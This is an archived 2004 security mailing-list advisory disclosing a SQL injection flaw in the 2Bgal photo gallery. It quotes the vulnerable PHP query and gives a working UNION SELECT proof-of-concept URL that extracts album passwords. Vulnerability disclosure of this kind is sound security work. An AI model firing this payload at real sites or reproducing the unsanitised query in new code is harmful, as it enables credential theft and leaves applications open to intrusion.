Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

2Bgal : 2.4 & 2.5.1 SQL injection Vulnerability

from [zib zib] Network Security [Permanent Link]
Subject: 2Bgal : 2.4 & 2.5.1 SQL injection Vulnerability
Date: 22 Dec 2004 07:49:19 -0000 


2Bgal 2.5.1 SQL injection Vulnerability
(http://www.ben3w.com/)
12/22/2004
----------------------------------------------------------------------
Description:
----------------------------------------------------------------------
2Bgal is fully customizable photo gallery. 
It's seems to be vulnerable at a SQL injection.


----------------------------------------------------------------------
Vulnerable code (disp_album.php(~53) and maybe disp_img.php)
----------------------------------------------------------------------
$chaine="SELECT nom,idpere FROM ".$tbl_alist." WHERE id=".$id_album;
$request = MYSQL_QUERY($chaine);
$nom_currentalbum = mysql_result($request,0,"nom");
$idpere_currentalbum = mysql_result($request,0,"idpere");



----------------------------------------------------------------------
Proof of concept (2Bgal with MySQL 4.x.x):
----------------------------------------------------------------------
http://www.server.com/2bgal/disp_album.php?id_album=2%20UNION%20SELECT%20passwd%20as%20nom,%20idpere%20FROM%20galbumlist%20LIMIT%201;
 --

This code allows you to get password for the first album.
You can play with SQL injection code to get others passwords.

----------------------------------------------------------------------
Version 
----------------------------------------------------------------------
2Bgal 2.5.1
2Bgal 2.4 (seems to be affected too)
others not tested

----------------------------------------------------------------------
Discovered by Romain Le Guen: 
http://coding.romainl.com
contact @AT@ romainl.com
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • 2Bgal : 2.4 & 2.5.1 SQL injection Vulnerability, zib zib <=
Previous by Date:  Security Advisory for ALL forum services with client-set images, James Bandara
Next by Date:  Re: WebWorm using PHPBB vulnerability in the wild!, Nick Johnson
Previous by Thread:  Security Advisory for ALL forum services with client-set images, James Bandara
Next by Thread:  SUSE Security Announcement: kernel local privilege escalation (SUSE-SA:2004:046), Marcus Meissner
Indexes:  [Date] [Thread] [Top] [All Lists]